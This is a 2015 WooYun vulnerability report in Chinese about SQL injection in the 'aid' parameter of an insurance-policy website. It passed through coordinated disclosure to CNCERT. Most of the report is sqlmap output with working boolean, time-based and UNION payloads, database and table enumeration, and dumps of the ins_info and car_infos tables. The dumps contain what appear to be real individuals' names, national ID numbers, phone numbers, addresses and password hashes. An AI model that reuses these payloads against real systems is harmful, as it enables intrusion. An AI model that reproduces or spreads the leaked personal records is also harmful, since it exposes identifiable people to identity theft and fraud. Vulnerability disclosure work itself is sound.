当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134408

漏洞标题:联保网存在SQL注入导致1w多人保单资料泄露

相关厂商:cncert国家互联网应急中心

漏洞作者: me1ody

提交时间:2015-08-19 23:05

修复时间:2015-10-05 17:46

公开时间:2015-10-05 17:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-19: 细节已通知厂商并且等待厂商处理中
2015-08-21: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-31: 细节向核心白帽子及相关领域专家公开
2015-09-10: 细节向普通白帽子公开
2015-09-20: 细节向实习白帽子公开
2015-10-05: 细节向公众公开

简要描述:

注入导致泄露资料
包括姓名 身份证 户口类型 手机号 住址保单内容
人险和车险

详细说明:

注入点

http://**.**.**.**/article.php?aid=42


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: aid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: aid=42 AND 2005=2005
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: aid=42 AND (SELECT * FROM (SELECT(SLEEP(10)))crDy)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: aid=-9624 UNION ALL SELECT CONCAT(0x7171716271,0x6a7a4a75764163625a71,0x7170767171)#
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] sq_lianb140728
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: aid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: aid=42 AND 2005=2005
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: aid=42 AND (SELECT * FROM (SELECT(SLEEP(10)))crDy)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: aid=-9624 UNION ALL SELECT CONCAT(0x7171716271,0x6a7a4a75764163625a71,0x7170767171)#
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
No tables found
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: aid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: aid=42 AND 2005=2005
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: aid=42 AND (SELECT * FROM (SELECT(SLEEP(10)))crDy)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: aid=-9624 UNION ALL SELECT CONCAT(0x7171716271,0x6a7a4a75764163625a71,0x7170767171)#
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
Database: sq_lianb140728
[11 tables]
+--------------+
| artical      |
| artical2     |
| autoInfos    |
| car_infos    |
| cardtype     |
| ins_info     |
| insco        |
| owner        |
| salesman     |
| servers      |
| vchicle_type |
+--------------+
Database: sq_lianb140728
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| ins_info     | 14700   |
| car_infos    | 475     |
| autoInfos    | 249     |
| vchicle_type | 61      |
| salesman     | 51      |
| artical      | 43      |
| artical2     | 43      |
| owner        | 42      |
| cardtype     | 18      |
| servers      | 9       |
| insco        | 6       |
+--------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: aid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: aid=42 AND 2005=2005
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: aid=42 AND (SELECT * FROM (SELECT(SLEEP(10)))crDy)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: aid=-9624 UNION ALL SELECT CONCAT(0x7171716271,0x6a7a4a75764163625a71,0x7170767171)#
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
Database: sq_lianb140728
Table: ins_info
[11 entries]
+------------+--------------------+-------------+---------+---------+---------+-------------+---------+----------+------------+----------+----------+----------+----------------------------------+----------+---------------------+----------+----------+----------+----------+------------+-----------------+---------------------+------------+------------+-------------+
| tou_idtype | tou_identity       | tel         | City    | Area    | email   | mobile      | linkman | address  | enddate    | bei_name | tou_name | relation | card_pwd                         | Province | lastdate            | buy_time | smalljob | workunit | jobclass | startdate  | card_code       | activeTime          | remarkDate | add_policy | card_status |
+------------+--------------------+-------------+---------+---------+---------+-------------+---------+----------+------------+----------+----------+----------+----------------------------------+----------+---------------------+----------+----------+----------+----------+------------+-----------------+---------------------+------------+------------+-------------+
| 身份证     | <blank>            | <blank>     | <blank> | <blank> | <blank> | <blank>     | <blank> | <blank>  | 0000-00-00 | <blank>  | <blank>  | <blank>  | 50F0193098D2E9A616488C9E6BC78DEC | <blank>  | 2017-01-01 00:00:00 | NULL     | <blank>  | -        | NULL     | 0000-00-00 | LB1501010000001 | 0000-00-00 00:00:00 | 0000-00-00 | <blank>    | 0           |
| 身份证     | -                  | -           | <blank> | <blank> | <blank> | <blank>     | <blank> | <blank>  | 0000-00-00 | <blank>  | -        | <blank>  | 16699F3EA4F18C455A67D4777198EA06 | <blank>  | 2017-01-01 00:00:00 | NULL     | <blank>  | -        | NULL     | 0000-00-00 | LB1501010000002 | 0000-00-00 00:00:00 | 0000-00-00 | <blank>    | 0           |
| 身份证     | 372833198002191916 | 18663506620 | 371500  | 371502  | <blank> | 18306588129 | 史银波 | 建设东路     | 2016-03-23 | 林令峰      | 林令峰      | 本人       | 9F2BF96AE39D50AFF8DE7D4D6ACA6580 | 370000   | 2017-01-01 00:00:00 | NULL     | 农民       | -        | NULL     | 2015-03-24 | LB1501010000003 | 2015-03-23 09:02:53 | 0000-00-00 | <blank>    | 2           |
| 身份证     | 372501196809168286 | 18663506620 | 371500  | 371502  | <blank> | 15206565468 | 史银波 | 建设东路     | 2016-03-23 | 庞其燕      | 庞其燕      | 本人       | 3EDA4E98F4730884A27A25A1A3CA84FF | 370000   | 2017-01-01 00:00:00 | NULL     | 农民       | -        | NULL     | 2015-03-24 | LB1501010000004 | 2015-03-23 09:04:25 | 0000-00-00 | <blank>    | 2           |
| 身份证     | 372501197001178267 | 18663506620 | 371500  | 371502  | <blank> | 15963179281 | 史银波 | 建设东路     | 2016-03-23 | 周胜芳      | 周胜芳      | 本人       | 1CB51DC2A201E7633C3770F23DE56DBC | 370000   | 2017-01-01 00:00:00 | NULL     | 农民       | -        | NULL     | 2015-03-24 | LB1501010000005 | 2015-03-23 09:05:57 | 0000-00-00 | <blank>    | 2           |
| 身份证     | 37252619750806504X | 18663538976 | 371500  | 371525  | <blank> | 15954565711 | 邹庆民 | 辛集乡后张官屯村 | 2016-04-07 | 李国       | 孔桂平      | 本人       | 8823F8EDE0286DFAAC506BC0760DA4E9 | 370000   | 2017-01-01 00:00:00 | NULL     | 农民       | -        | NULL     | 2015-04-08 | LB1501010000006 | 2015-04-06 09:16:36 | 0000-00-00 | <blank>    | 2           |
| 身份证     | 371502199111287514 | 13176957953 | 371500  | 371502  | <blank> | 13176957953 | 李秀云 | 建设东路     | 2016-05-13 | 吕路波      | 吕路波      | 本人       | B8E139B00FCF062E564AB6FB1F7D6EF2 | 370000   | 2017-01-01 00:00:00 | NULL     | 农民       | -        | NULL     | 2015-05-14 | LB1501010000008 | 2015-05-11 17:08:22 | 0000-00-00 | <blank>    | 2           |
| 身份证     | 372501197805098211 | 15275841618 | 371500  | 371502  | <blank> | 15275841618 | 李秀云 | 建设东路     | 2016-06-05 | 庞建勇      | 庞建勇      | 本人       | C107425B9DA98F023FFFDDD2D3D8D1E7 | 370000   | 2017-01-01 00:00:00 | NULL     | 农民       | -        | NULL     | 2015-06-06 | LB1501010000009 | 2015-06-04 10:31:26 | 0000-00-00 | <blank>    | 2           |
| 身份证     | 371502198905168221 | 18663538976 | 371500  | 371502  | <blank> | 18363565720 | 邹庆民 | 建设东路     | 2016-06-19 | 戴学丹      | 戴学丹      | 本人       | E77C4B37E306F74AB9B7457D893A96A2 | 370000   | 2017-01-01 00:00:00 | NULL     | 农民       | -        | NULL     | 2015-06-20 | LB1501010000011 | 2015-06-18 15:45:05 | 0000-00-00 | <blank>    | 2           |
+------------+--------------------+-------------+---------+---------+---------+-------------+---------+----------+------------+----------+----------+----------+----------------------------------+----------+---------------------+----------+----------+----------+----------+------------+-----------------+---------------------+------------+------------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: aid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: aid=42 AND 2005=2005
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: aid=42 AND (SELECT * FROM (SELECT(SLEEP(10)))crDy)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: aid=-9624 UNION ALL SELECT CONCAT(0x7171716271,0x6a7a4a75764163625a71,0x7170767171)#
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
Database: sq_lianb140728
Table: car_infos
[5 entries]
+-------+-------+---------+---------+--------------------+-------+-------------------------+---------+------------+---------+---------+-------------+----------------------------------+------------+-----------------+-------------+-------------+
| co_id | sl_id | auto_id | card_id | tou_identity       | yajin | policy                  | linkman | enddate    | project | tou_tel | tou_name    | card_pwd                         | startdate  | card_code       | card_status | linkman_tel |
+-------+-------+---------+---------+--------------------+-------+-------------------------+---------+------------+---------+---------+-------------+----------------------------------+------------+-----------------+-------------+-------------+
| 3     | 10    | 1       | 4       | 372526197009032710 | 000   | 23701009062004140000050 | 赵丽红     | 2015-11-17 | 驾驶员座    | <blank> | 申跃才         | 51711917CB29B654918737DFD3453FFF | 2014-11-18 | LB4600000400002 | 2           | <blank>     |
| 3     | 14    | 2       | 4       | 31307866-9         | 000   | 23701009062004140000072 | 尹辉      | 2015-11-24 | 驾驶员座    | <blank> | 高唐县盛荣运输有限公司 | 4C468EA5F68700B35FD5D8013EFA8265 | 2014-11-25 | LB4600000400003 | 2           | <blank>     |
| 3     | 14    | 2       | 4       | 31307866-9         | 000   | 23701009062004140000072 | 尹辉      | 2015-11-24 | 乘客座一    | <blank> | 高唐县盛荣运输有限公司 | D45CBDBACE059680E5AA11051609192B | 2014-11-25 | LB4600000400005 | 2           | <blank>     |
| 3     | 14    | 2       | 4       | 31307866-9         | 000   | 23701009062004140000072 | 尹辉      | 2015-11-24 | 乘客座二    | <blank> | 高唐县盛荣运输有限公司 | A75B42126C12D7932264D9901C21E769 | 2014-11-25 | LB4600000400006 | 2           | <blank>     |
| 3     | 0     | 3       | 4       | 05497857-3         | 000   | 23701009062004140000084 | 张明光     | 2015-12-03 | 驾驶员座    | <blank> | 聊城市金峰物流有限公司 | FC9BE6966296CFAD3346A0408F3A28EC | 2014-12-04 | LB4600000400043 | 2           | <blank>     |
+-------+-------+---------+---------+--------------------+-------+-------------------------+---------+------------+---------+---------+-------------+----------------------------------+------------+-----------------+-------------+-------------+


1.png


2.png


3.png

漏洞证明:

1.png


2.png


3.png

修复方案:

注入

版权声明:转载请注明来源 me1ody@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-08-21 17:45

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无